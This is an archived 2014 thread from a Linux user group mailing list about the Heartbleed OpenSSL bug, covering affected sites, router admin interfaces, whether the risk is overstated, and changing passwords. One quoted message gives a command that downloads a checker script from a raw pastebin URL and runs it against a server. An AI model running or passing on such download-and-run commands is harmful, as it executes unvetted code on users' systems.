[kwlug-disc] Heartbleed affected sites

unsolicited unsolicited at swiz.ca
Sat Apr 12 04:29:15 EDT 2014


That's over simplistic.

You can't extract a password that isn't there.

*IF* it is even in the packet you get.

*IF* it was being exploited at the time.

*IF* you are of interest to them.

*IF* they are interested in doing damage to that provider of services.

Lot of IFs. Lot of FUD.

What's being protected?

Will you know?

Will you care?

Not saying now that exploit known they wouldn't run with it.

But patching is simplistic.

I take your point about SSL keys - IF it was in the data returned.

But with properly isolated systems, it should only be the front end 
impacted. On the assumption that nobody inside your firewall is 
exploiting it.

Lots of IFs all around.

But I take your point.


On 14-04-11 05:44 PM, Bob Jonkman wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> If your router is accessible from the WAN port via http then you have
> more urgent problems than Heartbleed.
>
> If a site has both http and https then there's no (new) vulnerability
> with http, but a Heartbleed attack on https can still extract
> passwords and other info.
>
> To extract a password from an http session a bad guy needs to be a
> man-in-the-middle, or sniffing the network (remember Firesheep?). To
> extract a password with Heartbleed an attacker only has to initiate an
> https session.
>
> - --Bob.
>
>
>
> On 14-04-11 05:35 PM, Khalid Baheyeldin wrote:
>> But, wouldn't Heartbleed be an issue, only if you use SSL on the
>> site? For example, if you have OpenWRT/Tomato/DD-WRT and logging
>> via http (not https), then there is no exploit via OpenSSL?
>>
>>
>> On Fri, Apr 11, 2014 at 3:26 PM, Bob Jonkman <bjonkman at sobac.com>
>> wrote:
>>
>> If you're using a tool to check for Heartbleed vulnerabilities, be
>> sure to check the Web interface on your router and/or modem as
>> well.
>>
>> I'm not sure if router vendors are on top of this, but according
>> to ssltest.py my Tomato/MLPPP Version 1.25-mp3alpha6 (from
>> http://fixppp.org ) is not vulnerable, nor my Thomson Speedtouch
>> modem with firmware 6.1.0.5
>>
>> Also, somebody asked me how safe these vulnerability checking
>> tools are, especially the online and Javascript-based ones. What's
>> to say they're not merely displaying "all is well", and actually
>> compiling a list of vulnerable sites for later exploitation?
>>
>> --Bob.
>>
>>
>> On 14-04-08 12:06 PM, Khalid Baheyeldin wrote:>
>>>>> You can use this python tool ssltest.py to check if your
>>>>> servers are vulnerable:
>>>>>
>>>>> $ wget -O ssltest.py "http://pastebin.com/raw.php?i=WmxzjkXJ"
>>>>> $ python ssltest.py example.com
>>
>>
>> On 14-04-11 10:51 AM, CrankyOldBugger wrote:
>>>>> Mashable has a list going of sites affected by Heartbleed:
>>>>>
>>>>> http://mashable.com/2014/04/09/heartbleed-bug-websites-affected/
>>>>>
>>>>>
>>>>>
> Don't forget to add Canada Revenue (and most other government
>>>>> sites) to your list of passwords to change!
>>
>>
>>
>> Bob Jonkman <bjonkman at sobac.com>          Phone: +1-519-669-0388
>> SOBAC Microcomputer Services             http://sobac.com/sobac/
>> http://bob.jonkman.ca/blogs/    http://sn.jonkman.ca/bobjonkman/
>> Software   ---   Office & Business Automation   ---   Consulting
>> GnuPG Fngrprnt:04F7 742B 8F54 C40A E115 26C2 B912 89B0 D2CC E5EA
>>
>>>
>>>
>>> _______________________________________________ kwlug-disc
>>> mailing list kwlug-disc at kwlug.org
>>> http://kwlug.org/mailman/listinfo/kwlug-disc_kwlug.org
>>>
>>
>>
>>
>>
>>
>> _______________________________________________ kwlug-disc mailing
>> list kwlug-disc at kwlug.org
>> http://kwlug.org/mailman/listinfo/kwlug-disc_kwlug.org
>>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.14 (GNU/Linux)
> Comment: Ensure confidentiality, authenticity, non-repudiability
>
> iEYEARECAAYFAlNIYh8ACgkQuRKJsNLM5erCjgCfZAuLyG8v83bORUxPxTvs14m+
> r8kAoInhKmR99uQBN2cIt+2KY3xq4KMl
> =6dTX
> -----END PGP SIGNATURE-----
>
>
> _______________________________________________
> kwlug-disc mailing list
> kwlug-disc at kwlug.org
> http://kwlug.org/mailman/listinfo/kwlug-disc_kwlug.org
>




More information about the kwlug-disc mailing list